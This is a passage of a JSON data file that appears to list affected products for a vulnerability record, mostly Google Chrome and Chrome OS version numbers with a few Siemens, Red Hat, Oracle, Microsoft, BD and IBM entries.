{ "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364160" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1681.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.98" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.88" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.649.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.78" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.354.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.114" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.316.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.90" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.692.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.83" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.122" }, { "model": "servers sw", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "x861.0" }, { "model": "enterprise linux for power big endian", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.17" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.98" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.93" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.630.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.3.154.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.885.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.569.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.89" }, { "model": "simatic itp3000", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "v20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.962.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1675.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.306.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "59.0.3071.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.295.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.75" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.123" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.318.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.619.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1004" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.124" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1033" }, { "model": "simatic ipc627c", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1044" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.160" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1679.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.23" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "60.0.3112.114" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.70" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.51" }, { "model": "enterprise linux for scientific computing", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.539.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.661.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.777.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.106" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.91" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.105" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.939.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.474.0" }, { "model": "enterprise linux server tus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "-6.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.110" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.893.1" }, { "model": "security analytics", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "7.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.99" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "48.0.2564.82" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.507.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.883.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.306" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.62" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.348.0" }, { "model": "simatic hmi comfort panels", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.507.2" }, { "model": "windows server r2 for itanium-based systems sp1", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "2008" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.80" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.120" }, { "model": "simatic itp1000", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "54.0.2840.85" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.935.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.705.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1082.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.122" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1016.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.395.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.118" }, { "model": "ruggedcom rx1400 vpe", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.776.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1305.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.84" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.72" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "59.0.3071.91" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1075.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.84" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "43.0.2357.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.172" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.117" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.535.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.443.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.296.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.107" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.776.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.96379" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.217" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.114" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.900.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1074.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.126" }, { "model": "x-series xos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "10.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.75" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.611.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.71" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.407.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.57" }, { "model": "pyxis medstation es", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.892.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.51" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.518.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.346.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1658.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.897.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.102" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.421.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.132" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.56" }, { "model": "pyxis stockstation system", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.85" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.0" }, { "model": "simotion p320-4s", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "36.0.1985.143" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1003.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.927.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.382.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "49.0.2623.75" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.55" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.462.0" }, { "model": "simatic ipc827d", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1021.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.77" }, { "model": "enterprise linux server tus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "-7.2" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.16" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.818.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.645.0" }, { "model": "vrealize automation", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.126" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.23" }, { "model": "chrome ~~~and", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "38.0.2125.101" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1065.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.674.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.905.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.169" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.531.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.23" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.95" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.84" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1284.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.115" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1040.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.35" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.939.0" }, { "model": "windows version for 32-bit systems", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "1017030" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.758.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.19" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.1.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.93" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.116" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.99" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.184" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.154" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.112" }, { "model": "windows for 32-bit systems", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "48.0.2564.109" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.344" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.419.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.672.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.608.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.135" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.675.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.222.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.124" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.117" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.755.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1072.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.437.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.102" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.435.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.95" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.215" }, { 